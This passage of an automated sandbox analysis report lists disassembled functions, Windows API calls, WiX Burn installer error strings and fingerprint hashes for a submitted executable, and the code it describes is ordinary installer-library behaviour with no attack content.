                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                          • String ID: csm
                                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                                          • Opcode ID: 8bce646aca6b902b8a8e06c42f1c1a6471024598d6607a975997272646bd23e3
                                                                                                                                                          • Instruction ID: 8643f7d6eb143bfdde3ebae1ea1c9d147848d5b06b5817bd7b7b20f4e79cad61
                                                                                                                                                          • Opcode Fuzzy Hash: 8bce646aca6b902b8a8e06c42f1c1a6471024598d6607a975997272646bd23e3
                                                                                                                                                          • Instruction Fuzzy Hash: 21410734900218ABCF10DF69C884A9E7BB1AF8535DF14809AFC185F353D739DA99CB95
                                                                                                                                                          Function 004760EB Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 110COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                          • String ID: Failed to allocate memory for value.$Failed to allocate value.$Failed to get query information.$Failed to get size of value.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\inetutil.cpp
                                                                                                                                                          • API String ID: 1452528299-1009889864
                                                                                                                                                          • Opcode ID: 1d6e6aaed8eecc63fac98ba6fdcc5547f643e7bc34b5198ffd5a34d148f99d1e
                                                                                                                                                          • Instruction ID: 8843eaca0c5c7d3c01b1e6bcb5fbd0a5fe56aeee13a788f38fd53ca076f7ad38
                                                                                                                                                          • Opcode Fuzzy Hash: 1d6e6aaed8eecc63fac98ba6fdcc5547f643e7bc34b5198ffd5a34d148f99d1e
                                                                                                                                                          • Instruction Fuzzy Hash: 5D314832E40624FBD7219E558C49FEF7B39EF04721F524137FA09BA2C1E2789E009698
                                                                                                                                                          Function 00468509 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegQueryInfoKeyW.ADVAPI32(?,?,00418389,00000000,?,?,?), ref: 00468534
                                                                                                                                                          • RegEnumValueW.ADVAPI32(?,?,00418389,00000000,?,?,?), ref: 004685B9
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: EnumInfoQueryValue
                                                                                                                                                          • String ID: Failed to allocate array for registry value name$Failed to enumerate registry value$Failed to get max size of value name under registry key.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                          • API String ID: 918324718-781229554
                                                                                                                                                          • Opcode ID: 41471647dced34feb768b422c6bd16d79a4c91c5bfd38ab4e1597f77e3a78a69
                                                                                                                                                          • Instruction ID: 447334ac04d9c9018c6eab6a3e85cb572b2267db757db1085b0edb3a9ac6cea6
                                                                                                                                                          • Opcode Fuzzy Hash: 41471647dced34feb768b422c6bd16d79a4c91c5bfd38ab4e1597f77e3a78a69
                                                                                                                                                          • Instruction Fuzzy Hash: 58213776604219BFEB114A098D44EAB376DDB807A4F21013FBD05BB390FA7C8D0196BE
                                                                                                                                                          Function 00416BE1 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 104registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,004221A7,000000FF,00D47D83,000000FF,00000000,PackageVersion,004221A7,500B74C0,?,00000001,00000000,004221A7,?,004221A7), ref: 00416C6B
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,PackageVersion,004221A7,500B74C0,?,00000001,00000000,004221A7,?,004221A7,00000000,?,?,?,004221A7), ref: 00416C88
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to format key for update registration., xrefs: 00416C0F
                                                                                                                                                          • Failed to remove update registration key: %ls, xrefs: 00416CBD
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\registration.cpp, xrefs: 00416C21, 00416CCF
                                                                                                                                                          • PackageVersion, xrefs: 00416C4C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseCompareString
                                                                                                                                                          • String ID: Failed to format key for update registration.$Failed to remove update registration key: %ls$PackageVersion$d:\a\wix\wix\src\burn\engine\registration.cpp
                                                                                                                                                          • API String ID: 446873843-1552062835
                                                                                                                                                          • Opcode ID: 4e2f349253f13d80a3c0ca46be93cd4c4c71c30380a5a5432032e77d4090e6ca
                                                                                                                                                          • Instruction ID: a07fd4fad8dc904094a4160f50fa6cdd7f88f81db1c87e14812a48324d9cc182
                                                                                                                                                          • Opcode Fuzzy Hash: 4e2f349253f13d80a3c0ca46be93cd4c4c71c30380a5a5432032e77d4090e6ca
                                                                                                                                                          • Instruction Fuzzy Hash: 08310931D40224BBDB21ABA9CD06FDFBE78DF00754F11026BB954B6191F67C8A81C6D8
                                                                                                                                                          Function 0046820B Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 100COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memcpy_s
                                                                                                                                                          • String ID: Error reading version registry value due to unexpected data type: %u$Failed to convert registry string to version.$Failed to copy QWORD version value.$Failed to read version registry value.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                          • API String ID: 2001391462-1875010524
                                                                                                                                                          • Opcode ID: bcd5991336eb22e5a31ec228a225e69b438fadc2c126e0c72ac8c41272e4e561
                                                                                                                                                          • Instruction ID: f753ef0490fdc1cf21c2ce11b5575267757f4104593fa0deddb2e0144d009a50
                                                                                                                                                          • Opcode Fuzzy Hash: bcd5991336eb22e5a31ec228a225e69b438fadc2c126e0c72ac8c41272e4e561
                                                                                                                                                          • Instruction Fuzzy Hash: D521F431A80714B7DB3056458C4EF9F7B289B52B64F1001AFFA007A2C1F9794940C69A
                                                                                                                                                          Function 0046D534 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseErrorExecuteHandleLastShell
                                                                                                                                                          • String ID: PDGu$ShellExecEx failed with return code: %d$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\shelutil.cpp
                                                                                                                                                          • API String ID: 3023784893-2236508546
                                                                                                                                                          • Opcode ID: 07644c966cc1f92338ddaaca5053e6d129bd7d4530e2e7d216928021cb60d487
                                                                                                                                                          • Instruction ID: 2cd075708efec31ea9baf64a34c1020b1a73156107f3c420ec179f7094fffcde
                                                                                                                                                          • Opcode Fuzzy Hash: 07644c966cc1f92338ddaaca5053e6d129bd7d4530e2e7d216928021cb60d487
                                                                                                                                                          • Instruction Fuzzy Hash: 28313AB5E00219ABDB10DF5ACC45A9EBBF8AF98754F14402BFD05F7350E77899008BA9
                                                                                                                                                          Function 0044ECE8 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 88COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • IsWindow.USER32(?), ref: 0044ED2F
                                                                                                                                                            • Part of subcall function 004073CD: GetProcessHeap.KERNEL32(?,?,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073DE
                                                                                                                                                            • Part of subcall function 004073CD: HeapAlloc.KERNEL32(00000000,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073E5
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocProcessWindow
                                                                                                                                                          • String ID: BA passed NULL hwndParent to Apply.$BA passed invalid hwndParent to Apply.$Failed to alloc BAENGINE_ACTION$Failed to enqueue apply action.$d:\a\wix\wix\src\burn\engine\externalengine.cpp
                                                                                                                                                          • API String ID: 2772125699-1527517701
                                                                                                                                                          • Opcode ID: 4e656d76197757d7e97402f0cbc66b9a5773a5e590136485e17914798e10a8ae
                                                                                                                                                          • Instruction ID: da726627c15c848a104714498f2997eec8c8eff0ac0e18e37f99bcbc5c9e70dd
                                                                                                                                                          • Opcode Fuzzy Hash: 4e656d76197757d7e97402f0cbc66b9a5773a5e590136485e17914798e10a8ae
                                                                                                                                                          • Instruction Fuzzy Hash: 392107B1F80315B7F62155068C4BFAB2A5CAB00F68F21407BB904BE2D1E6FD5D0042AD
                                                                                                                                                          Function 0041C464 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 87COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • InitializeAcl.ADVAPI32(00000000,00000008,00000002,0000001A,00000000,00000000,00000000,000000B0), ref: 0041C4C8
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041C4D2
                                                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000001,20000004,00000000,00000000,00000000,00000000,00000003,000007D0,00000000,00000000,000000B0), ref: 0041C53E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AttributesErrorFileInitializeLast
                                                                                                                                                          • String ID: Failed to allocate administrator SID.$Failed to initialize ACL.$d:\a\wix\wix\src\burn\engine\cache.cpp
                                                                                                                                                          • API String ID: 669721577-465332322
                                                                                                                                                          • Opcode ID: 34b7461a4d530753b4bf5e92ccaa87a78ca1522b4eda8fdedb3831200cd0ce1c
                                                                                                                                                          • Instruction ID: cccf3788ec9b8586252bc9805f9a57de2c71f808e50afeb1abc925b2017da11e
                                                                                                                                                          • Opcode Fuzzy Hash: 34b7461a4d530753b4bf5e92ccaa87a78ca1522b4eda8fdedb3831200cd0ce1c
                                                                                                                                                          • Instruction Fuzzy Hash: 1221FB72E8422477E7216A998C86FEFB66DAB40B54F11412BB904F72C1E6BCAD404798
                                                                                                                                                          Function 00439460 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLastWrite_memcpy_s
                                                                                                                                                          • String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$d:\a\wix\wix\src\burn\engine\cabextract.cpp
                                                                                                                                                          • API String ID: 1970631241-2055879782
                                                                                                                                                          • Opcode ID: 0beaebafe2ee6d04d1baa1715cca62c73455fd08a0970b90525722e9edd07730
                                                                                                                                                          • Instruction ID: 0c89f0c3f72117500d099aca204455961e6fe4908b82beba8c84e9566b86ad4c
                                                                                                                                                          • Opcode Fuzzy Hash: 0beaebafe2ee6d04d1baa1715cca62c73455fd08a0970b90525722e9edd07730
                                                                                                                                                          • Instruction Fuzzy Hash: 5A21F776640201BBCB11DF19DC45E5B7B68EF88724F1140AAFE04AB292D2B5DD408758
                                                                                                                                                          Function 004664D7 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 81registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,?,?,?,00000000,?,?,?,00466476,?), ref: 004665A3
                                                                                                                                                          Strings
                                                                                                                                                          • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 004664ED
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\osutil.cpp, xrefs: 00466536
                                                                                                                                                          • Failed to read registry value to detect UAC., xrefs: 0046657B
                                                                                                                                                          • Failed to open system policy key to detect UAC., xrefs: 00466527
                                                                                                                                                          • EnableLUA, xrefs: 0046654D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID: EnableLUA$Failed to open system policy key to detect UAC.$Failed to read registry value to detect UAC.$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\osutil.cpp
                                                                                                                                                          • API String ID: 3535843008-2939735829
                                                                                                                                                          • Opcode ID: 1107931d0c56a6205a510f224f898a9ccfab87ac150862af2f9a0b04c0123adb
                                                                                                                                                          • Instruction ID: 4a09614d3ca843ea8fc48879366deed1c73b9815d1639a1d3e4c884d063fd266
                                                                                                                                                          • Opcode Fuzzy Hash: 1107931d0c56a6205a510f224f898a9ccfab87ac150862af2f9a0b04c0123adb
                                                                                                                                                          • Instruction Fuzzy Hash: FA212C32E40336FBD7205A989C47FABAA689B10714F17413BA902B7184F27C5D4092DA
                                                                                                                                                          Function 00439548 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75timeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 004395C6
                                                                                                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004395D8
                                                                                                                                                          • SetFileTime.KERNEL32(?,?,?,?), ref: 004395EB
                                                                                                                                                          • CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,004390FA,?,?), ref: 004395FA
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Time$File$CloseDateHandleLocal
                                                                                                                                                          • String ID: Invalid operation for this state.$d:\a\wix\wix\src\burn\engine\cabextract.cpp
                                                                                                                                                          • API String ID: 609741386-4292832330
                                                                                                                                                          • Opcode ID: c2b3e8cffb58dbb8f65cce85fcbf5be41fd17bca71c55d689dbcd056dd678b82
                                                                                                                                                          • Instruction ID: 6c06349ec86f0ea72859a7cf247af5361c79d8c6fc428ff323c60139705469a2
                                                                                                                                                          • Opcode Fuzzy Hash: c2b3e8cffb58dbb8f65cce85fcbf5be41fd17bca71c55d689dbcd056dd678b82
                                                                                                                                                          • Instruction Fuzzy Hash: 1A21C872804219BBC710DF698C899AB7B6CFB08720F504267F915E66D0D3B8DD51CB98
                                                                                                                                                          Function 0045DA43 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,0045DB52,?,?,00000000,?,?,?,0045DCAC,00000022,FlsSetValue,004A27EC,004A27F4,?), ref: 0045DB04
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                          • API String ID: 3664257935-537541572
                                                                                                                                                          • Opcode ID: e7889416c23faad9a2c741454c5f54c366a01d1cd2b8caa6eadf0fccda3664e9
                                                                                                                                                          • Instruction ID: ccbd003d1c4037fdb7fa7a7dcdc219e9b012f34e258aff95dd90c1b83703c3d7
                                                                                                                                                          • Opcode Fuzzy Hash: e7889416c23faad9a2c741454c5f54c366a01d1cd2b8caa6eadf0fccda3664e9
                                                                                                                                                          • Instruction Fuzzy Hash: 36210535E06211ABCB319B249C40B5B3768EF41371F250262FC15A73A2DAB8ED08C6D9
                                                                                                                                                          Function 00405B5B Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 73fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,00000001,00000000,?,00417261,00000001,00000080,?,00000000), ref: 00405B73
                                                                                                                                                          • GetLastError.KERNEL32(?,00417261,00000001,00000080,?,00000000,?,00418D09,00000001,00000140,?,?,?,?,?,000000B0), ref: 00405B80
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,00000001,00417261,?,00417261,00000001,00000080,?,00000000,?,00418D09,00000001,00000140), ref: 00405C10
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                          • String ID: Failed to open file: %ls$Failed to write to file: %ls$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                          • API String ID: 2528220319-2512000822
                                                                                                                                                          • Opcode ID: 469b366029f5e20c11686477cdbecb290cb07182ff267c73feb6e70e70adf947
                                                                                                                                                          • Instruction ID: a036cf87a8f5432173604349357c4b04caf10fd95255e0eb715f316a5ad05461
                                                                                                                                                          • Opcode Fuzzy Hash: 469b366029f5e20c11686477cdbecb290cb07182ff267c73feb6e70e70adf947
                                                                                                                                                          • Instruction Fuzzy Hash: 7C113B336417143BE73129148C0AFAB3B19DB41B70F114237FF147A1E1D6789C50AAE8
                                                                                                                                                          Function 0046CBA2 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • PathAllocCanonicalize.KERNELBASE(?,?,0046CCF2), ref: 0046CBDF
